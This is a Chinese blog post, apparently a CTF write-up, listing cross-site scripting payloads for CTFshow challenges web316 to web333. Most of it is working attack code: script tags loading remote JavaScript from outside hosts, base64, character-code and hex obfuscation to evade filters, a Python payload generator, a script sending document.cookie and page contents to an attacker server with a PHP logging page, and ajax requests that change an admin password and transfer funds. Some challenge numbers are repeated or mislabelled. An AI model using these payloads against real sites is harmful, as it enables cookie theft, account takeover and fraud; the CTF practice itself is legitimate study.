天天看點
傳回

[CTFSHOW]XSS入門(佛系記錄)

文章目錄

  • ​​前言​​
  • ​​web316​​
  • ​​web317-319​​
  • ​​前面某些題梭哈​​
  • ​​web320​​
  • ​​web321​​
  • ​​web322-324過濾了;​​
  • ​​web325過濾了.​​
  • ​​前面那個String.fromCharCode生産payload​​
  • ​​web327​​
  • ​​web328​​
  • ​​web329​​
  • ​​web320​​
  • ​​web331​​
  • ​​web322-323​​
  • ​​參考連結​​

前言

以下需要師父們自己url解碼哦,然後大部分使用了xss平台盲打連接配接最下方也有,過濾空格用/,師傅們注意這可能不是一篇WP,我之前忘記備份了嗚嗚,湊合着用一下,相關原理自己琢磨下

web316

​​http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E​​

web317-319

​​http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E​​

前面某些題梭哈

<input οnfοcus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>

web320

​​http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));”​​

web321

​​http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));”​​

web322-324過濾了;

<body/οnlοad=‘document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));’>

web325過濾了.

<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

web326過濾了括号

<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

前面那個String.fromCharCode生産payload 

a= "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''
res2 = ''
for i in a:
  tmp = ord(i)
  res += str(tmp)
  res+=","
  res2 +=f"document.write(String.fromCharCode({str(tmp)}));"
# print(res)
# print(res2)

a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
z = 0
res = ''
for i in a:
  if z ==2:
    z=0
  if z ==0:
    res+=r"\x"
  res += i
  z+=1
print(res)

web327

注意收件人是admin,無過濾

web328

自己搭建,主要是偷管理者的cookie

寫一個js

var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);

下面是index.php

<?php 
  $cookie = $_GET['q'];
  $myFile = "cookie.txt";
  file_put_contents($myFile, $cookie, FILE_APPEND);
?>

注冊​

​<script src=你的js位址></script>​

​ 之後把這個cookie替換掉浏覽器裡面本身的,通路使用者管理頁面就可以了

web329

從這道題以後,群主設定了把cookie發送給你之前就讓它失效了,是以換一個思路擷取頁面元素

自己搭建

var img = new Image();
 img.src = “http://y4tacker.top/index.php?q=”+document.querySelector(’#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main’).textContent;
 document.body.append(img); <?php $cookie = $_GET['q']; $myFile = "cookie.txt"; file_put_contents($myFile, $cookie, FILE_APPEND); ?>

web320 

通過上一道題發現密碼是admin*******是以改密碼吧
 $.ajax({url:“http://127.0.0.1/api/change.php?p=111111”,success:function(result){}});

web331 

$.ajax({
 url: “http://127.0.0.1/api/change.php”,
 method: “POST”,
 data:{
 ‘p’:‘111111’
 },
 cache: false,
 success: function(res){}});

web322-323

一個是get請求,一個是post請求,payload類似web331,主要是向admin那裡轉賬到自己注冊的新号,然後去買flag就行了,當然你們可以發現題目其實有個小漏洞,自己向自己轉錢錢也還會越來越多

$.ajax({
                url: "http://127.0.0.1/api/amount.php",
                method: "POST",
                data:{
                    'u':'y4tacker',
                    'a':10000
                },
                cache: false,
                success: function(res){
                    
            }});

參考連結

php 3c 3d
上一篇: div引用不同的html,js怎麼根據不同分辨率調用不同css檔案?
下一篇: 根據IE版本不同調用不同CSS樣式檔案

繼續閱讀